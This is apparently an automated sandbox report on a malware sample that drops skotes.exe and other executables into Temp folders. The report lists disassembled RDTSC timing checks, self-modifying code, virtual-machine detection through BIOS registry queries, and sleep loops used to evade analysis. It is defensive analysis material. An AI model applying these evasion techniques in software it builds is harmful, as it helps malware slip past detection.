Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5410967 second address: 54109A5 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F6BF4F65164h 0x00000008 xor ecx, 76D05628h 0x0000000e jmp 00007F6BF4F6515Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 test byte ptr [76FA6968h], 00000002h 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 push ebx 0x00000022 pop eax 0x00000023 mov ebx, 2D822B22h 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 54109A5 second address: 5410A5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6BF4B2C368h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F6C66631D4Bh 0x0000000f pushad 0x00000010 movzx esi, di 0x00000013 pushfd 0x00000014 jmp 00007F6BF4B2C363h 0x00000019 and si, DD7Eh 0x0000001e jmp 00007F6BF4B2C369h 0x00000023 popfd 0x00000024 popad 0x00000025 mov edx, dword ptr [ebp+0Ch] 0x00000028 jmp 00007F6BF4B2C35Eh 0x0000002d xchg eax, ebx 0x0000002e jmp 00007F6BF4B2C360h 0x00000033 push eax 0x00000034 jmp 00007F6BF4B2C35Bh 0x00000039 xchg eax, ebx 0x0000003a jmp 00007F6BF4B2C366h 0x0000003f xchg eax, ebx 0x00000040 jmp 00007F6BF4B2C360h 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b popad 0x0000004c rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5410A5C second address: 5410A78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6BF4F65168h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5410A78 second address: 5410A7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5410A7E second address: 5410A82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5410ACA second address: 5410ACE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5410ACE second address: 5410AD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5410AD4 second address: 5410ADA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5410ADA second address: 5410B35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 pushad 0x0000000a call 00007F6BF4F6515Dh 0x0000000f mov bx, cx 0x00000012 pop ecx 0x00000013 pushfd 0x00000014 jmp 00007F6BF4F6515Dh 0x00000019 xor cx, 0AA6h 0x0000001e jmp 00007F6BF4F65161h 0x00000023 popfd 0x00000024 popad 0x00000025 pop ebx 0x00000026 jmp 00007F6BF4F6515Eh 0x0000002b mov esp, ebp 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 movsx ebx, si 0x00000033 push ecx 0x00000034 pop ebx 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5420C9A second address: 5420D11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F6BF4B2C35Dh 0x00000008 pop ecx 0x00000009 pushfd 0x0000000a jmp 00007F6BF4B2C361h 0x0000000f or esi, 131170F6h 0x00000015 jmp 00007F6BF4B2C361h 0x0000001a popfd 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e xchg eax, ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 pushad 0x00000023 popad 0x00000024 pushfd 0x00000025 jmp 00007F6BF4B2C369h 0x0000002a adc eax, 22A04D06h 0x00000030 jmp 00007F6BF4B2C361h 0x00000035 popfd 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5420D11 second address: 5420D37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6BF4F65161h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F6BF4F6515Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5420D37 second address: 5420D47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6BF4B2C35Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 54A071C second address: 54A0722 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 54A0722 second address: 54A0726 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 54A0726 second address: 54A0768 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6BF4F65160h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F6BF4F6515Dh 0x00000015 or eax, 23D51966h 0x0000001b jmp 00007F6BF4F65161h 0x00000020 popfd 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 54A0768 second address: 54A076D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 54A076D second address: 54A0790 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F6BF4F65161h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 54A0790 second address: 54A07C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6BF4B2C367h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6BF4B2C365h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 54A07C3 second address: 54A07D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6BF4F6515Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 54A07D3 second address: 54A07E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ebx, esi 0x0000000f mov bh, al 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 54909CB second address: 54909D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 54909D1 second address: 54909D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 54909D7 second address: 54909DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 54909DB second address: 5490A25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6BF4B2C35Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F6BF4B2C35Ch 0x00000014 pushfd 0x00000015 jmp 00007F6BF4B2C362h 0x0000001a adc ecx, 0023FE48h 0x00000020 jmp 00007F6BF4B2C35Bh 0x00000025 popfd 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5490A25 second address: 5490A75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6BF4F6515Fh 0x00000009 and cx, 188Eh 0x0000000e jmp 00007F6BF4F65169h 0x00000013 popfd 0x00000014 mov ch, 1Fh 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F6BF4F65166h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5490800 second address: 5490812 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6BF4B2C35Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5490812 second address: 5490816 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5490816 second address: 5490825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5490825 second address: 549083E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6BF4F65165h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 549083E second address: 549084E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6BF4B2C35Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 549084E second address: 5490852 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5490852 second address: 5490898 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b pushad 0x0000000c movsx edx, cx 0x0000000f push esi 0x00000010 jmp 00007F6BF4B2C365h 0x00000015 pop esi 0x00000016 popad 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F6BF4B2C369h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5490898 second address: 549089E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 549089E second address: 54908A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 54300F4 second address: 5430193 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 pushad 0x00000009 pushfd 0x0000000a jmp 00007F6BF4F65164h 0x0000000f adc ch, FFFFFFD8h 0x00000012 jmp 00007F6BF4F6515Bh 0x00000017 popfd 0x00000018 jmp 00007F6BF4F65168h 0x0000001d popad 0x0000001e push eax 0x0000001f pushad 0x00000020 movsx edi, si 0x00000023 popad 0x00000024 xchg eax, ebp 0x00000025 jmp 00007F6BF4F6515Fh 0x0000002a mov ebp, esp 0x0000002c pushad 0x0000002d mov ax, BE7Bh 0x00000031 pushfd 0x00000032 jmp 00007F6BF4F65160h 0x00000037 xor eax, 00D483C8h 0x0000003d jmp 00007F6BF4F6515Bh 0x00000042 popfd 0x00000043 popad 0x00000044 pop ebp 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007F6BF4F65165h 0x0000004c rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5490CAC second address: 5490CC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6BF4B2C364h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5490CC4 second address: 5490CC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5490CC8 second address: 5490CEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov eax, 310B7013h 0x0000000f mov dx, si 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F6BF4B2C361h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5490CEF second address: 5490CF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5490CF5 second address: 5490CF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5490CF9 second address: 5490D17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6BF4F65162h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5490D17 second address: 5490D8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6BF4B2C35Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F6BF4B2C364h 0x00000013 sbb al, 00000058h 0x00000016 jmp 00007F6BF4B2C35Bh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F6BF4B2C368h 0x00000022 xor ax, 9DB8h 0x00000027 jmp 00007F6BF4B2C35Bh 0x0000002c popfd 0x0000002d popad 0x0000002e push dword ptr [ebp+08h] 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 mov edx, 008C89A6h 0x00000039 mov ebx, 25E79A32h 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5490D8A second address: 5490DE3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, si 0x00000006 jmp 00007F6BF4F65162h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e call 00007F6BF4F65159h 0x00000013 pushad 0x00000014 push ecx 0x00000015 mov dl, 67h 0x00000017 pop esi 0x00000018 push edx 0x00000019 jmp 00007F6BF4F65162h 0x0000001e pop esi 0x0000001f popad 0x00000020 push eax 0x00000021 jmp 00007F6BF4F65160h 0x00000026 mov eax, dword ptr [esp+04h] 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5490DE3 second address: 5490DE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5490DE7 second address: 5490DEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5490DEB second address: 5490DF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5490DF1 second address: 5490E29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6BF4F6515Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jmp 00007F6BF4F65169h 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5490E29 second address: 5490E2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5490E2D second address: 5490E31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xwZfYpo16i.exe RDTSC instruction interceptor: First address: 5490E31 second address: 5490E37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Special instruction interceptor: First address: 28EC9D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Special instruction interceptor: First address: 28EBD1 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Special instruction interceptor: First address: 4BEF52 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: B6EC9D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: B6EBD1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: D9EF52 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Special instruction interceptor: First address: 343B15 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Special instruction interceptor: First address: 4E7904 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Special instruction interceptor: First address: 513FE6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Special instruction interceptor: First address: 5813A3 instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\xwZfYpo16i.exe Code function: 0_2_05490DAE rdtsc 0_2_05490DAE
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1363 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 402 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1414 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Window / User API: threadDelayed 6960 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Window / User API: foregroundWindowGot 1321 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Window / User API: threadDelayed 7807
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Window / User API: threadDelayed 785
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Window / User API: threadDelayed 477
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Window / User API: foregroundWindowGot 1761
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Window / User API: threadDelayed 7660
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Window / User API: foregroundWindowGot 1760
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe API coverage: 3.8 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4836 Thread sleep count: 43 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4836 Thread sleep time: -86043s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 348 Thread sleep count: 1363 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 348 Thread sleep time: -2727363s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5428 Thread sleep count: 402 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5428 Thread sleep time: -12060000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3136 Thread sleep time: -360000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4564 Thread sleep count: 1414 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4564 Thread sleep time: -2829414s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe TID: 1308 Thread sleep time: -69600s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe TID: 5168 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe TID: 380 Thread sleep count: 7807 > 30
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe TID: 380 Thread sleep time: -78070s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe TID: 380 Thread sleep count: 785 > 30
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe TID: 380 Thread sleep count: 477 > 30
Source: C:\Users\user\AppData\Local\Temp\1000349001\4db5303091.exe TID: 4444 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe TID: 3272 Thread sleep count: 7660 > 30
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe TID: 3272 Thread sleep time: -76600s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe TID: 3272 Thread sleep count: 314 > 30
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe TID: 3272 Thread sleep count: 122 > 30
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Sleep loop found (likely to delay execution)
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Thread sleep count: Count: 6960 delay: -10 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Thread sleep count: Count: 7807 delay: -10
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Thread sleep count: Count: 7660 delay: -10
Source: C:\Users\user\Desktop\xwZfYpo16i.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00EADBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 7_2_00EADBBE
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00E7C2A2 FindFirstFileExW, 7_2_00E7C2A2
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00EB68EE FindFirstFileW,FindClose, 7_2_00EB68EE
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00EB698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 7_2_00EB698F
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00EAD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 7_2_00EAD076
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00EAD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 7_2_00EAD3A9
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00EB9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 7_2_00EB9642
